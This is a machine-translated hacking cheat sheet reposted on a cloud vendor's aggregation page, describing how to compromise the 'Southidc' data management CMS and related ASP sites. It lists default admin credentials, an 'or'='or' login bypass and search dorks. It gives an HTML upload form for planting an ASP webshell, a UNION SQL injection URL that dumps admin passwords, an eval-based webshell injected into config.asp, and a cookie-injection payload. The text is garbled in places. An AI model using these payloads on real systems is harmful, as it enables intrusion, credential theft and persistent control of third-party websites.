The southern data management system uses shell (a small summary)

Source: Internet
Author: User

Default Value:

Admin
Admin admin888
'Or' = 'or'
Default database databases/079lidc. MDB

Change style upload: http://www.yangtong.com/admin/southidceditor/admin_style.asp

Upload a package
 

 

Note

 

Http://www.xxx.cn/NewsType.asp? Smallclass = 'Union select 0, username + CHR (124) + password, from Admin Union select * from news where 1 = 2 and ''='

W78cms website management system
Keywords inurl: shopmore. asp? ID
Use the/admin/ewebeditor/admin default account password admin 198625

Keywords: inurl: alogin. asp
Trojan upload Suffix: asp;.asp.jpg
Admin/upload. asp? Fuptype = dB & fupname = Ach. asp;. ASP & frmname = Ach. asp

 

1. use the upfile_other.asp vulnerability file to directly obtain the shell
and open userreg. ASP is used to register a member and log on to the user. The Code is as follows:


<Meta content = "mshtml 6.00.2800.1400" name = generator> <Body leftmargin = 0 topmargin = 0>
<Form name = form1 action = "http://www.target.com/upfile_Other.asp"; method = post
Enctype = multipart/form-data> <input class = "tx1" type = file size = 30 name = FILENAME> <input class = "tx1" type = file size = 30 name = filename1> <input style = "border-right: RGB (88,88, 88) 1px double; border-top: RGB (88,88, 88) 1px double; font-weight: normal; font-size: 9pt; border-left: RGB (88,88, 88) 1px double; line-Height: normal; border-bottom: RGB (88,88, 88) 1px double; font-style: normal; font-variant: normal "type = submit value = upload name = submit>
<Input id = photourlid type = hidden value = 0 name = photourlid> </form> </body> Save the above Code as HTML format, replace the URL in the code, select the image file in the first box, and select. Cer Asa or ASP file for upload in the second box, followed by a space.

 

2. SQL Injection
Http://www.target.com/NewsType.asp? Smallclass = '% 20 Union % 20 select % 200, username % 2 BCHR (124) % 2 bpassword, 2, 3, 4, 5, 6, 7, 8, 9% 20 from % 20 admin % 20 Union % 20 select % 20 * % 20 from % 20 news % 20 where % 201 = 2% 20and % 20 ''='
The above Code directly exposes the Administrator account and password. The shell method is as follows:
Write in the copyright information of website configuration [http://www.target.com/admin/siteconfig.asp;
"%> <% Eval (Request (CHR (35) %> <%'
Shell written to http://www.target.com/inc/config.asp successfully
Here, the CHR (32) password is "#"

 

3. Cookie Injection
Clear the address bar, use the Union statement for injection, and submit:
Javascript: Alert (document. cookie = "id =" + escape ("1 and 1 = 2 Union select 1, username, password, 10 from admin "))
You can also use the cookie injection Conversion Tool of the eldest brother hedgehog.

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.